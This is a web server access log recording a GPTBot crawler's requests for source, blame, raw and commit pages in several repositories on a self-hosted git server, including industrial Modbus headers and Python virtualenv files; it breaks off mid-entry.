"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11597] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?files=.gitignore" [Client 74.7.227.38] [Length 15453] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" -[17/Feb/2026:15:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 12648] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:15:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:15:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:15:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10095] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" -[17/Feb/2026:15:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10682] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13923] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10320] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15776] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9965] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9977] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19852] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11040] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19886] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11070] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" -[17/Feb/2026:15:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17264] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:15:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:15:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9956] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10282] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" -[17/Feb/2026:15:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude" [Client 74.7.227.38] [Length 29169] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" -[17/Feb/2026:15:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15737] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22398] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9923] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:15:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude%2fsite" [Client 74.7.227.38] [Length 29193] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:15:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9935] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:15:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include" [Client 